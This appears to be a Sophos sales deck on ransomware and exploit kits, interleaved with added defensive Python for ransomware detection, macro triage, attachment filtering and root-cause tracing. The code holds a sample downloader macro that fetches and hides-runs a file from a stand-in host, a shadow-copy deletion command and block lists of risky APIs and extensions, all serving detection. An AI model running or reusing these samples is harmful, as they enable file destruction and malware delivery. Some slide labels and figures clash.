Sophos – Become an IT hero
Dean Shroll – Director Sales Engineering
Arnie Rice – Enterprise Sales Engineer, TOLA
Sophos Snapshot

• Founded 1985 in Oxford, UK; HQ Abingdon, UK
• $534.9M in billings (FY16)
• ~2,700 employees
• 200,000+ customers, 100M+ users
• 90+% best-in-class renewal rates
• 20,000+ channel partners
Mission
To be the best in the world at delivering
complete IT security to mid-market enterprises
and the channel that serves them
Strategy
Security only
Focus on mid-market enterprises
Complete security – Made simple
Integrated Next Gen endpoint and network security
Managed and delivered through the cloud
‘Channel First’ sales model
Threat Landscape 2016
Data Breaches - The root of the problem

• 400,000 new malware samples per day
• >6,800 vulnerabilities per year
• >90% of data breaches use exploits
• ~24 available exploit methods
• >70% of companies have been breached, a >30% increase from 2015

Traditional Anti-Virus
○ File analytics
○ Heuristics
○ URL blocking
○ Black/white lists
○ Signatures
○ Sandboxing

Patch Management
○ Vulnerability scanning
○ Device management
○ Patch testing and deployment

SIEM and EDR
○ Anomaly detection
○ Security Operations Center
○ Forensic breach assessment teams

Sophos Intercept
○ Exploit and ransomware prevention
○ Incident response report
○ Root cause determination
Where Malware Gets Stopped

• 80%: exposure prevention (URL blocking, web scripts, download reputation)
• 10%: pre-execution analytics (generic matching, heuristics, core rules)
• 5%: signatures (known malware, malware bits)
• 3%: run-time behavior analytics (runtime behavior)
• 2%: exploit detection (technique identification)

The first three layers stop traditional malware; the last two stop advanced threats. Note: each model standalone is 80-95% effective. This last 5% is the SCARY stuff.
Malvertising Threat Chain (figure: third party, ad network, real-time bidding (RTB))
Ransomware today
What is Ransomware?
• "There are different types of ransomware. However, all of them will prevent you from using your PC normally, and they will all ask you to do something before you can use your PC." (Microsoft)

Ransomware can:
○ Prevent access
○ Encrypt files
○ Stop certain applications from running

Ransomware normally demands a payment (ransom) in order to restore normal operation.
2 main vectors of attack

• SPAM (via social engineering)
○ Seemingly plausible sender
○ Has an attachment, e.g. invoice, parcel delivery note
○ The attachment contains an embedded macro
○ When the attachment is opened and macros are enabled, the macro downloads and then executes the ransomware payload
○ Used by Locky, TorrentLocker, CTB-Locker
• Exploit kits
○ Black-market tools used to easily create attacks that exploit known or unknown (zero-day) vulnerabilities
○ Client-side vulnerabilities, usually targeting the web browser and its plug-ins
○ Angler, Neutrino
Many ways to fool/interest you
Exploit Kits
What is an Exploit Kit?
… software kit designed to run on web servers, with the purpose of identifying software vulnerabilities in client machines communicating with it, and discovering and exploiting vulnerabilities to upload and execute malicious code on the client…
…tend to be deployed covertly on legitimate Web sites that have been hacked, unknown to the site operators and visitors.
Exploits as a Service (figure)

• Victims send the initial request to the gateway servers, which handle the redirection and serve the landing page
• The malware distribution servers hold the exploits and malicious payloads and collect stats
• Exploit kit customers and the exploit kit admin reach the management panel over Tor to get the current domain, get stats and update payloads
Angler: an all-too-well-known exploit kit

• Grown in notoriety since mid 2014
○ The payload is stored in memory and the disk file is deleted
○ Detects security products and virtual machines
○ Able to spread many infections: banking Trojans, backdoors, rootkits, ransomware
• Easy to use
○ Doesn't require any particular technical competence
○ Available for a few thousand USD on the Dark Web
Chain of infection for the Angler exploit kit

1. The victim accesses a compromised web server through a vulnerable browser
2. The compromised web server redirects the connection to an intermediary server
3. In turn, the intermediary server redirects the connection to the attacker's server, which hosts the landing page of the exploit kit
4. The landing page looks for vulnerable plug-ins (Java, Flash, Silverlight) and their version numbers
5. If a vulnerable browser or plug-in is detected, the exploit kit fires the matching exploit, drops its payload and infects the system
Is Angler Dead?

1. 2016-06-07T05:29:46Z: when our last hit for Angler was recorded.
2. Activity started to dip in January 2016 but went back up in February.
3. Russia's Federal Security Service (FSB) arrested 50 people tied to the Lurk malware gang (about $50M in thefts).
4. Is Neutrino filling the void?
Anatomy of a ransomware attack
Ransomware

Ransomware Evolves
Anatomy of a ransomware attack

Installation via an exploit kit or spam with an infected attachment
Once installed, the ransomware modifies registry keys (e.g. for persistence).

Contact with the command & control server of the attacker
The ransomware sends information about the infected computer to the C&C server and downloads an individual public key for this computer.

Encryption of assets
Certain files are then encrypted on the local computer and on all accessible network drives. In practice each file is encrypted with a symmetric key, and that key is wrapped with the downloaded public key, so only the attacker's private key can unwrap it. Automatic backups of the Windows OS (shadow copies) are often deleted to prevent data recovery.

Ransom demand
A message appears on the user's desktop, explaining how a ransom (often in bitcoins) can be paid within a time frame of e.g. 72 hours to enable decryption of the data with the private key that only the attacker's system has access to.

And gone
The ransomware then deletes itself, leaving just the encrypted files and ransom notes behind.
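The behaviour in this sequence (mass encryption of documents, renames to a new extension, shadow-copy deletion) is what a CryptoGuard-style monitor keys on instead of file signatures. The following Python is an added example, not Sophos code: a small sliding-window detector run over constructed Sysmon-like endpoint events. The event schema, the thresholds and the process names are assumptions for the demo.

```python
"""Behavioural ransomware detection over endpoint events (added example).

Watches for what the attack anatomy describes: one process turning many user
documents into high-entropy data in a short burst, renaming them to a new
extension, and deleting Volume Shadow Copies.  Events are constructed inline
in the shape a Sysmon-like sensor would emit (hypothetical schema).
"""
import math
import os
import random
from collections import defaultdict, deque

DOC_EXTS = {".docx", ".xlsx", ".pptx", ".pdf", ".jpg", ".txt"}
# Tool + argument pairs used to destroy local restore points.
SHADOW_KILL = (("vssadmin", "delete shadows"), ("wmic", "shadowcopy delete"))


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: ciphertext and compressed data sit near 8, text near 4-5."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def is_shadow_copy_deletion(cmdline: str) -> bool:
    low = " ".join(cmdline.lower().split())          # normalise case and spacing
    return any(tool in low and verb in low for tool, verb in SHADOW_KILL)


class RansomwareDetector:
    """Per-process sliding windows; alerts once per (rule, pid)."""

    def __init__(self, window_s=10.0, min_files=5, entropy_threshold=7.0):
        self.window_s = window_s
        self.min_files = min_files
        self.entropy_threshold = entropy_threshold
        self.high_entropy_writes = defaultdict(deque)   # pid -> deque[(ts, path)]
        self.ext_renames = defaultdict(deque)           # pid -> deque[(ts, path)]
        self.alerts = []

    def _alert(self, kind, ev):
        if not any(a["kind"] == kind and a["pid"] == ev["pid"] for a in self.alerts):
            self.alerts.append({"kind": kind, "pid": ev["pid"],
                                "process": ev["process"], "ts": ev["ts"]})

    def _distinct_in_window(self, q, ev):
        q.append((ev["ts"], ev["path"]))
        while q and ev["ts"] - q[0][0] > self.window_s:
            q.popleft()
        return len({path for _, path in q})

    def feed(self, ev):
        if ev["op"] == "exec":
            if is_shadow_copy_deletion(ev.get("cmdline", "")):
                self._alert("shadow_copy_deletion", ev)
        elif ev["op"] == "write":
            if shannon_entropy(ev["data"]) >= self.entropy_threshold:
                q = self.high_entropy_writes[ev["pid"]]
                if self._distinct_in_window(q, ev) >= self.min_files:
                    self._alert("rapid_encryption", ev)
        elif ev["op"] == "rename":
            old_ext = os.path.splitext(ev["path"])[1].lower()
            new_ext = os.path.splitext(ev["new_path"])[1].lower()
            if old_ext in DOC_EXTS and new_ext not in DOC_EXTS:
                q = self.ext_renames[ev["pid"]]
                if self._distinct_in_window(q, ev) >= self.min_files:
                    self._alert("mass_extension_change", ev)
        return self.alerts


def sample_events():
    """Constructed telemetry: a benign editor, then a Locky-style encryptor."""
    rng = random.Random(7)                      # fixed seed: deterministic ciphertext stand-in
    events = []
    for i in range(6):                          # winword saves plain text: no alert expected
        events.append({"ts": 1.0 + i, "pid": 100, "process": "winword.exe", "op": "write",
                       "path": rf"C:\Users\bob\Documents\memo{i}.docx",
                       "data": b"Quarterly memo text " * 200})
    for i in range(6):                          # encryptor overwrites, then renames to .locky
        blob = bytes(rng.getrandbits(8) for _ in range(4096))
        path = rf"C:\Users\bob\Documents\report{i}.xlsx"
        events.append({"ts": 20.0 + i * 0.5, "pid": 200, "process": "inv.exe",
                       "op": "write", "path": path, "data": blob})
        events.append({"ts": 20.1 + i * 0.5, "pid": 200, "process": "inv.exe",
                       "op": "rename", "path": path, "new_path": path[:-5] + ".locky"})
    events.append({"ts": 24.0, "pid": 200, "process": "inv.exe", "op": "exec",
                   "cmdline": "vssadmin.exe Delete Shadows /All /Quiet"})
    return events


def run(events):
    det = RansomwareDetector()
    for ev in events:
        det.feed(ev)
    return det.alerts
```

The entropy rule on its own will also fire on legitimate bulk writes of already-compressed data (zip, jpg), which is why it is paired with the extension-change and shadow-copy rules; a production monitor would additionally compare each file's entropy before and after the write and keep copies for rollback.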
Ransom demands
Paying ransoms
• Payment is made in bitcoins
• Instructions are available via Tor
• The ransom increases the longer you take to pay
• On payment of the ransom, the attacker's private key (or a decryption tool that contains it) is provided so you can decrypt your files; the public key alone cannot decrypt anything
Common ransomware:
Locky:
• Nickname of a newer strain of ransomware, so-called because it renames all your important files so that they have the extension .locky
• Ransoms vary from BTC 0.5 to BTC 1.00 (1 BTC is worth about $635 as of 10/13/16).
• Started hitting the headlines in early 2016
• Wreaking havoc with at least 400,000 machines affected worldwide
A common Locky attack

• You receive an email containing an attached document.
○ The document looks like gobbledegook.
○ The document advises you to enable macros "if the data encoding is incorrect."
○ The criminals want you to click on the 'Options' button at the top of the page.
• Once you click Options (enabling macros), Locky will start to execute on your computer.
• It encrypts wallet.dat (Bitcoin wallet) along with your other files.
• As soon as it is ready to ask you for the ransom, it changes your desktop wallpaper.
• The format of the demand varies, but the results are the same.
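To make the macro vector concrete (the spam vector from "2 main vectors of attack" and the Locky lure above), here is an added Python example, not code from Sophos or from the deck, that triages an Office attachment offline: it checks whether an OOXML package carries a vbaProject.bin part, decompresses an MS-OVBA module stream, and flags the auto-exec plus download-and-run pattern the slides describe. The sample document, macro text and keyword lists are constructed for the demo; a real vbaProject.bin is an OLE compound file whose module streams you would extract with a library such as olefile (not shown).

```python
# Offline triage of a macro-bearing Office attachment (added example).
# VBA module streams inside vbaProject.bin use MS-OVBA compression
# ([MS-OVBA] 2.4.1); decompress_vba() reverses it so the source can be scanned.
import io
import math
import re
import struct
import zipfile

AUTO_EXEC = ("AutoOpen", "Document_Open", "AutoExec", "Workbook_Open")
DOWNLOAD_EXEC = ("URLDownloadToFile", "XMLHTTP", "ADODB.Stream",
                 "WScript.Shell", "Shell(", "CreateObject")


def decompress_vba(container: bytes) -> bytes:
    """0x01 signature, then chunks: 2-byte header (bit 15 = compressed, bits 0-11 =
    chunk size - 3) followed by flag bytes and literal/copy tokens."""
    if not container or container[0] != 0x01:
        raise ValueError("missing 0x01 container signature")
    out, pos = bytearray(), 1
    while pos + 2 <= len(container):
        header = struct.unpack_from("<H", container, pos)[0]
        chunk_end = min(pos + (header & 0x0FFF) + 3, len(container))
        pos += 2
        chunk_start = len(out)
        if not header & 0x8000:                 # uncompressed chunk: raw bytes follow
            out += container[pos:chunk_end]
            pos = chunk_end
            continue
        while pos < chunk_end:
            flags = container[pos]              # bit i describes token i, LSB first
            pos += 1
            for bit in range(8):
                if pos >= chunk_end:
                    break
                if not (flags >> bit) & 1:
                    out.append(container[pos])  # literal byte
                    pos += 1
                    continue
                token = struct.unpack_from("<H", container, pos)[0]
                pos += 2
                # Offset/length bit split grows with the bytes already produced in this chunk.
                produced = len(out) - chunk_start
                bit_count = 4 if produced < 2 else max(math.ceil(math.log2(produced)), 4)
                length = (token & (0xFFFF >> bit_count)) + 3
                offset = (token >> (16 - bit_count)) + 1
                for _ in range(length):         # byte-wise so overlapping copies work
                    out.append(out[len(out) - offset])
    return bytes(out)


def pack_literal_only(text: bytes) -> bytes:
    # Encoder used only to build the sample: one chunk made of literal tokens.
    assert len(text) <= 3600, "single-chunk demo encoder"
    body = bytearray()
    for i in range(0, len(text), 8):
        body.append(0x00)                       # flag byte: next eight tokens are literals
        body += text[i:i + 8]
    header = 0xB000 | (len(body) + 2 - 3)       # compressed=1, signature bits=0b011, size-3
    return b"\x01" + struct.pack("<H", header) + bytes(body)


def has_vba_project(ooxml: bytes) -> bool:
    # A package with a vbaProject.bin part contains macros, whatever its extension says.
    with zipfile.ZipFile(io.BytesIO(ooxml)) as z:
        return any(n.lower().endswith("vbaproject.bin") for n in z.namelist())


def macro_indicators(vba_source: str) -> dict:
    auto = [k for k in AUTO_EXEC if k in vba_source]
    dl = [k for k in DOWNLOAD_EXEC if k in vba_source]
    verdict = "downloader" if auto and dl else ("suspicious" if auto or dl else "clean")
    return {"auto_exec": auto, "download_exec": dl, "verdict": verdict,
            "urls": re.findall(r"https?://[^\s\"']+", vba_source)}


def triage(ooxml: bytes, module_streams: list) -> dict:
    """module_streams: compressed VBA module streams; in real files they live inside
    the OLE container vbaProject.bin and are extracted with e.g. olefile (not shown)."""
    result = {"has_vba": has_vba_project(ooxml), "verdict": "clean"}
    if result["has_vba"]:
        source = "".join(decompress_vba(s).decode("latin-1") for s in module_streams)
        result.update(macro_indicators(source))
    return result


# Constructed sample: a Locky-style downloader macro (not real malware).
SAMPLE_MACRO = b"""Sub AutoOpen()
    Dim u As String: u = "http://example.invalid/invoice.exe"
    Dim p As String: p = Environ("TEMP") & "\\inv.exe"
    URLDownloadToFile 0, u, p, 0, 0
    Call Shell(p, vbHide)
End Sub
"""
# Hand-built container with one copy token: "AutoOpen " then 8 bytes copied from 9 back.
SAMPLE_COPY = b"\x01\x0c\xb0\x00AutoOpen\x02 \x05\x80"


def build_sample_docm(vba_part: bytes = None) -> bytes:
    # Minimal OOXML package; here vbaProject.bin holds the bare compressed stream,
    # whereas a real one is an OLE compound file.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        if vba_part is not None:
            z.writestr("word/vbaProject.bin", vba_part)
    return buf.getvalue()
```

Keyword matching on decompressed source is deliberately simple; real lures obfuscate strings (concatenation, Chr() calls), so a gateway would combine this with emulation or sandbox detonation rather than rely on it alone.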
Odin (Locky's brother)

• You receive an email containing an attached document.
○ "Order Processed" email
○ .zip claiming it is your order receipt
○ Unzipped, it contains 2 files (cancellation form, order details)
• The "cancellation form" is actually a JavaScript file (surprise)
○ Runs under the Windows Script Host, outside the browser, so it bypasses browser sandboxing
○ Downloads the Odin ransomware with no pop-ups
• Encrypts files with a randomly generated AES key
• Encrypts each AES key with an RSA public key
• Fault-tolerant encryption
• Changes wallpaper
RAA

• Targets businesses for larger payouts
• Composed entirely of JavaScript
○ Masquerades as Word (.doc) files
○ Leverages CryptoJS (open-source library)
○ AES encryption
• Distributed via email attachment
○ The document appears to be corrupt to the end user
○ Meanwhile the script scans available drives and uses CryptoJS to encrypt files in the background
○ Drops a copy of Pony (a credential stealer)
○ Deletes shadow copies
• Generates its encryption key locally, so it needs no Internet connection
TorrentLocker
• Almost exclusively distributed via sophisticated spam campaigns
○ High quality emails
○ Translated into multiple languages (Dutch, Japanese, Korean, Italian, Spanish …)
• Highly targeted geographically
• Peculiarity: Use of the victim machine’s address book to send the ransomware to other machines
• Communicates with its C&C server over HTTPS (POST requests) to make detection more difficult
CTB-Locker variant that attacks websites

• Same name as the ransomware that attacks Windows computers
• Written in PHP
• First attack in the UK on 12th February 2016
• Already many hundreds of sites have been attacked
• Attacks websites by encrypting all files in their web directories
• A password-protected 'shell' is installed on most of the affected sites, allowing attackers to connect to the server(s) via a backdoor
• Uses elliptic-curve (ECC) encryption locally; no Internet connection is required to pull a key
Petya

• Latest variant of ransomware
• Ransoms usually BTC 1.00 (1 BTC is worth $594 as of 9/21/16, $635 as of 10/13/16)
• Started hitting the headlines in early 2016
• Majority of infections across the pond (Europe), but starting to see it active in the US
• Needs admin privileges to complete infection
• More targeted attacks, disguised as an email from Human Resources
• Overwrites the MBR (Master Boot Record) with its own boot code and encrypts the MFT (Master File Table), making the disk unreadable without the key
• Creates a fake Blue Screen of Death to force a reboot
Mischa (now paired with Petya for double the fun)

• If Petya fails because it lacks admin privileges, the installer falls back to Mischa: ransomware with fault tolerance
• No admin privileges needed
• Started hitting the headlines in mid 2016
• Stateside in full effect
• Back to file-level encryption
• Encrypts .exe files as well as the normal targets
• Very difficult to clean from an infected machine
• Ransoms higher than Petya, usually BTC 1.75 to 2 (1 BTC is worth $594 as of 9/21/16, $635 as of 10/13/16)
Why these attacks are so successful
Why are these attacks so successful?
Professional attack technology
• Highly professional approach, e.g. usually provides the actual decryption key after payment of the ransom
• Skillful social engineering
• Hides malicious code in technologies that are permitted in many companies, e.g. Microsoft Office macros, JavaScript, VBScript, Flash …
Why are these attacks so successful?
Security weaknesses in the affected companies
• Inadequate backup strategy
• Updates and patches are not implemented swiftly enough
• Dangerous user rights/permissions: users have more than they need
• Lack of user security training
• Security systems are not implemented or used correctly
• Lack of IT security knowledge
• Conflicting priorities: security vs productivity concerns
Why Is It So Challenging to Address New Threats?

Security vs IT Ops:
• 6,787 new vulnerabilities in 2015, a 31% increase from 2014
• 80% of breaches are from known vulnerabilities
• 193 days on average to fix vulnerabilities after initial discovery

(Sources: Gartner, WhiteHat Security, Forrester)
Practical steps for protection
Security solution requirements

As a minimum you should:
• Patch, Patch, Patch and oh ya PATCH
• Deploy antivirus protection
• Block spam
• Use a sandboxing solution
• Block risky file extensions (JavaScript, VBScript, CHM, etc.)
• Block password-protected archive files (they cannot be scanned at the gateway)
• Use URL filtering (block access to C&C servers)
• Use HTTPS filtering
• Use HIPS (host intrusion prevention system)
• Activate your client firewalls
• Use a whitelisting solution
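Several of these rules (block risky extensions, block password-protected archives) are mechanical enough to express as code. The following Python is an added example, not Sophos gateway logic: an attachment policy that applies the rules recursively inside zip archives, which is where the Odin and RAA campaigns hid their JavaScript. Attachment names and contents are constructed for the demo; the extension list and the nesting and size limits are assumptions.

```python
"""Mail-gateway attachment policy: the slide's rules as code (added example).

Blocks script and executable attachment types, looks inside archives (the Odin
and RAA campaigns shipped .js inside a .zip or under a .doc name), treats double
extensions such as form.pdf.js by their final extension, and quarantines
password-protected archives because the gateway cannot scan them.
"""
import io
import os
import zipfile

RISKY_EXTS = {"js", "jse", "vbs", "vbe", "wsf", "wsh", "hta", "chm", "scr", "exe",
              "com", "pif", "cmd", "bat", "ps1", "jar", "lnk", "docm", "xlsm"}
MAX_DEPTH = 3                   # nested-archive limit (assumed policy value)
MAX_MEMBER = 50 * 1024 * 1024   # refuse to inflate anything larger (zip-bomb guard)


def final_ext(name: str) -> str:
    base = os.path.basename(name.replace("\\", "/"))
    return base.rsplit(".", 1)[-1].lower() if "." in base else ""


def assess(name: str, data: bytes, depth: int = 0):
    """Return (verdict, reason); verdict is 'allow', 'block' or 'quarantine'."""
    ext = final_ext(name)
    if ext in RISKY_EXTS:
        return "block", f"risky attachment type .{ext}: {name}"
    if ext == "zip":
        if depth >= MAX_DEPTH:
            return "quarantine", f"archive nested more than {MAX_DEPTH} deep: {name}"
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as z:
                for info in z.infolist():
                    if info.flag_bits & 0x1:        # general-purpose bit 0: encrypted entry
                        return "quarantine", f"password-protected archive, cannot scan: {name}"
                    if info.file_size > MAX_MEMBER:
                        return "quarantine", f"oversized member {info.filename} in {name}"
                    verdict, reason = assess(info.filename, z.read(info), depth + 1)
                    if verdict != "allow":
                        return verdict, reason
        except zipfile.BadZipFile:
            return "quarantine", f"unreadable archive: {name}"
    return "allow", ""


def make_zip(members: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for member_name, member_data in members.items():
            z.writestr(member_name, member_data)
    return buf.getvalue()


def mark_encrypted(zip_bytes: bytes) -> bytes:
    """Fixture helper: set flag bit 0 in every local and central header so the
    archive reports encrypted entries (zipfile cannot write real ones)."""
    buf = bytearray(zip_bytes)
    for sig, off in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
        i = buf.find(sig)
        while i != -1:
            buf[i + off] |= 0x01
            i = buf.find(sig, i + 4)
    return bytes(buf)


def sample_attachments() -> dict:
    """Constructed attachments modelled on the campaigns in the deck."""
    return {
        "invoice.pdf": b"%PDF-1.4 harmless sample",
        "Order_details.zip": make_zip({"Cancellation_Form.pdf.js": b"var a=1;",
                                       "Order_details.txt": b"order 1234"}),
        "receipt.zip": make_zip({"inner.zip": make_zip({"receipt.exe": b"MZ"})}),
        "scan.zip": mark_encrypted(make_zip({"scan.pdf": b"not really encrypted"})),
        "photo.zip": make_zip({"holiday.jpg": b"\xff\xd8\xff"}),
    }


def assess_all(attachments: dict) -> dict:
    return {name: assess(name, data)[0] for name, data in attachments.items()}
```

Extension checks are only the first filter: a gateway should also sniff content (an .exe renamed to .txt still has an MZ header) and hand anything that passes to sandbox detonation.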
Additional steps

• Employee awareness & training
○ Sophos IT Security Dos and Don'ts
○ Sophos Threatsaurus
• Segment the company network
○ NAC solutions ensure only known computers can access the network
○ Separate functional areas within a firewall, e.g. client and server networks
• Encrypt company data
○ It doesn't stop the ransomware but prevents damage caused by sensitive documents getting into the wrong hands
• Use security analysis tools
○ If an infection does occur, it's vital that the source is identified and contained ASAP.
Fighting back: TeslaCrypt
Cryptowall cost users $325M in 2015, up to $1.1B in 2016
○ 2 out of 3 infections driven by phishing attacks
○ Delivered by drive-by exploit kits
○ 100,000s of victims worldwide

More variants: Locky and Samas (SamSam)
○ Now for Mac and Windows users

Targeting bigger phish
○ $17K payment from a California hospital

CryptoGuard (available now)
• Simple and comprehensive
• Universally prevents spontaneous encryption of data
• Notifies the end user on rapid encryption events
• Rolls back to the pre-encrypted state
Root Cause Analysis

How? What? Who? When? Why? Where?

Where did it get in? Should we contact a regulator? What damage has been done? Did they steal important data?
Incident Response – Understanding the activity

Identified event: file infection (HIPS cleaned Bob.exe)

Threat chain, in time order:
1. Fred.pdf created: copied from a USB device
2. Fred.com accessed: a low-reputation site, accessed via acrobat.exe
3. Bob.exe created: written by iExplore.exe, from URL fred.com
4. Bob.exe reached out to a C2 site
5. HIPS cleaned Bob.exe (the identified event)
Branched chain: Datacollector.exe created, written by iExplore.exe from URL fred.com

Root cause attribution: PDF delivered from USB
Recommended action: leverage Device Control

• Threat chain: full list of IOCs from the Sophos Data Recorder including process, registry, file and network activity
• Timeline of events: view the order of operations from root cause to detected malicious activity
• At-risk assets: identification of all productivity documents related to the complete threat chain
• Branched threat chains: the threat chain includes suspect activity related to the root cause
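The chain above can be reconstructed mechanically once the endpoint records created-by, launched-by and opened-document relations. The Python below is an added example, not the Sophos Root Cause Analysis implementation: it walks back from the HIPS detection on Bob.exe to the USB-delivered Fred.pdf and reports the timeline, IOCs, the Datacollector.exe branch and the at-risk documents. The event schema and the recommendation table are assumptions; the events are constructed to match the slide.

```python
"""Root-cause attribution from endpoint telemetry (added example).

Walks backwards from a detection through "created by", "launched by" and
"opened document" relations to find the event that brought the threat onto the
machine.  The event schema is hypothetical, not the Sophos Data Recorder format.
"""
from collections import defaultdict

DOC_EXTS = (".pdf", ".docx", ".xlsx", ".pptx", ".txt")
# External delivery channels and the control that closes each one (assumed table).
RECOMMENDATION = {"usb": "Leverage Device Control",
                  "url": "Block the site and tighten web filtering",
                  "email": "Tighten attachment filtering at the email gateway"}

# Constructed events reproducing the Fred.pdf -> fred.com -> Bob.exe chain.
SAMPLE_EVENTS = [
    {"ts": 1, "type": "file_create", "pid": 10, "path": r"C:\Users\bob\Downloads\Fred.pdf",
     "origin": r"usb:E:\Fred.pdf"},
    {"ts": 2, "type": "process_start", "pid": 20, "ppid": 10, "image": r"C:\Adobe\acrobat.exe"},
    {"ts": 3, "type": "file_open", "pid": 20, "path": r"C:\Users\bob\Downloads\Fred.pdf"},
    {"ts": 4, "type": "process_start", "pid": 30, "ppid": 20, "image": r"C:\IE\iexplore.exe"},
    {"ts": 5, "type": "net_connect", "pid": 30, "dest": "fred.com", "reputation": "low"},
    {"ts": 6, "type": "file_create", "pid": 30, "path": r"C:\Users\bob\AppData\Bob.exe",
     "origin": "url:http://fred.com/Bob.exe"},
    {"ts": 7, "type": "file_create", "pid": 30, "path": r"C:\Users\bob\AppData\Datacollector.exe",
     "origin": "url:http://fred.com/dc.exe"},
    {"ts": 8, "type": "process_start", "pid": 40, "ppid": 30, "image": r"C:\Users\bob\AppData\Bob.exe"},
    {"ts": 9, "type": "file_open", "pid": 40, "path": r"C:\Users\bob\Documents\payroll.xlsx"},
    {"ts": 10, "type": "net_connect", "pid": 40, "dest": "c2.example.invalid", "reputation": "c2"},
    {"ts": 11, "type": "detection", "pid": 40, "path": r"C:\Users\bob\AppData\Bob.exe",
     "detail": "HIPS cleaned Bob.exe"},
]


def analyze(events: list, detection: dict = None) -> dict:
    detection = detection or next(e for e in events if e["type"] == "detection")
    starts = {e["pid"]: e for e in events if e["type"] == "process_start"}
    created = {e["path"]: e for e in events if e["type"] == "file_create"}
    by_pid = defaultdict(list)
    for e in events:
        if e["type"] in ("file_open", "net_connect"):
            by_pid[e["pid"]].append(e)

    chain, pids, files = [detection], set(), set()
    work = [("pid", detection["pid"])]
    while work:
        kind, key = work.pop()
        if kind == "pid" and key in starts and key not in pids:
            pids.add(key)
            start = starts[key]
            chain.append(start)
            chain.extend(by_pid[key])                     # its connections and document opens
            work.append(("file", start["image"]))         # who put the binary there?
            work.append(("pid", start["ppid"]))           # who launched it?
            work.extend(("file", e["path"]) for e in by_pid[key] if e["type"] == "file_open")
        elif kind == "file" and key in created and key not in files:
            files.add(key)
            chain.append(created[key])
            work.append(("pid", created[key]["pid"]))     # the writer's own history
    chain.sort(key=lambda e: e["ts"])

    root = next((e for e in chain if "origin" in e), None)   # earliest externally sourced file
    channel = root["origin"].split(":", 1)[0] if root else None
    in_chain = {id(e) for e in chain}
    return {
        "root_cause": root,
        "recommendation": RECOMMENDATION.get(channel, "No external origin found; review manually"),
        "timeline": chain,
        "iocs": {"network": sorted({e["dest"] for e in chain if e["type"] == "net_connect"}),
                 "files": sorted(files)},
        "branches": [e["path"] for e in events
                     if e["type"] == "file_create" and e["pid"] in pids and id(e) not in in_chain],
        "at_risk": sorted({e["path"] for e in chain
                           if e["type"] == "file_open" and e["path"].lower().endswith(DOC_EXTS)}),
    }
```

Note that explorer.exe (pid 10) has no process_start record in the sample, so the walk stops at the USB-sourced file_create; with a full recorder the walk would continue through the parent tree until it hits an external origin or the record horizon, which is why the 30-day retention on the next slide matters.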
Sophos Data Recorder

Understanding the root cause of an attack: first, keep a log of what the endpoint has been doing (memory, registry, network, file system, process activity).

Operating systems
• Windows
• Mac OS in early 2017

Capacity
• Up to 30 days of activity
• 100 MB
• Local to the device
• Under 0.5% CPU utilization
Complete protection: Enduser and Network

Sophos Central
• Enduser: Next-Gen Endpoint Protection, Mobile Control, SafeGuard Encryption, Server Security
• Network: Next-Gen Firewall / UTM, Web Security, Email Security, Wireless Security

• Secure the Endpoint (PC/Mac): next-gen endpoint security to prevent, detect, investigate and remediate
• Secure the Mobile Device: secure smartphones and tablets just like any other endpoint
• Secure the Servers: protection optimized for the server environment (physical or virtual): fast, effective, controlled
• Protect the Data: simple-to-use encryption for a highly effective last line of defense against data loss
• Secure the Perimeter: ultimate enterprise firewall performance, security, and control
• Secure the Web: advanced protection, control, and insights that are effective, affordable, and easy
• Secure the Email: email threats and phishing attacks don't stand a chance
• Secure the Wireless: simple, secure Wi-Fi connection
Sophos Sandstorm
How Sophos Sandstorm works
1. If the file has known malware it's blocked immediately. If it's otherwise suspicious, and hasn't been seen before, it will be sent to the sandbox for further analysis. When web browsing, users see a "please wait" message while they wait.
2. The file is detonated in the safe confines of the sandbox and monitored for malicious behaviour. A decision to allow or block the file will be sent to the security solution once the analysis is complete.
3. A detailed report is provided for each file analyzed.
Advanced Threat Defense Made Simple: available with the Secure Web Gateway, Secure Email Gateway, Unified Threat Management and Next-Gen Firewall
Security as a System

Synchronized Security: integrated, context-aware security where Enduser and Network technology share meaningful information to deliver better protection

• Security must be comprehensive: the capabilities required to fully satisfy customer need
• Security can be made simple: platform, deployment, licensing, user experience
• Security is more effective as a system: new possibilities through technology cooperation

Next Gen Enduser Security and Next Gen Network Security exchange a heartbeat through Sophos Cloud, backed by SophosLabs.
“No other company is close to delivering this type of synchronized and integrated communication between endpoint and
network security products.”
Chris Christiansen, VP of Security Products, IDC
Sophos Central
Partner Dashboard: Allows Partners to manage multiple customer installations
Admin:
Endpoint Protection
Email Security
Web Gateway
Server Protection
Encryption
Mobile Protection
Wireless
Self Service: Allows users to customize security status and notifications
Page 53
Robust Innovation Pipeline for 2016/2017
ENDPOINT
• Next Gen Endpoint: Exploit Prevention, Anti-Ransomware, Root Cause Analysis
• Sophos Clean
• Role-based Administration in Sophos Central
MOBILE
• Unified Endpoint Management
• Security Heartbeat
• Sophos Central managed Full EMM
• iOS Mobile Security
SERVER
• Hyper-V protection
• AWS Auto-scaling
• MTD for Linux, Windows
• Security Heartbeat
UTM/NGFW
• Sophos UTM 9.5
• XG Firewall and Firewall Manager v16
• New Synchronized Security Use Cases
• New XG Series Appliances
WEB
• Global Sophos Central managed SWG
• Next-Gen Web Protection
• Hybrid On-Prem and Cloud Model
• Simplified licensing and pricing
ENCRYPTION
• Synchronized Encryption
• Sophos Central managed Full Disk Encryption
• Multiple Key Support
WIRELESS
• Sophos Central managed Wireless
• New Sophos Secure Access Points
• New XG 1x Series Wireless Appliances
EMAIL
• Sophos Central managed Sophos Email
• Time of Click Protection
• New Anti-Spam Engine
• New Sophos Email Appliances
Page 54
This Is Next-Gen IT Security
Page 55
The Evolution of Threats: From Malware to Exploits (timeline chart, Traditional Malware to Advanced Threats)
Labelled points: Melissa Virus, 1999, $1.2B; Love Letter Worm, $15B; FinFisher Spyware, 2003, $780M; Exploit as a Service, 2015, $500M; Locky Ransomware, 2016, $1.1B
Further chart values without a recoverable label: 1998, $2.3B; 2007, $800M; 2014
Page 56
The Evolution of Security: From Anti-Malware to Anti-Exploit (Traditional Malware to Advanced Threats)
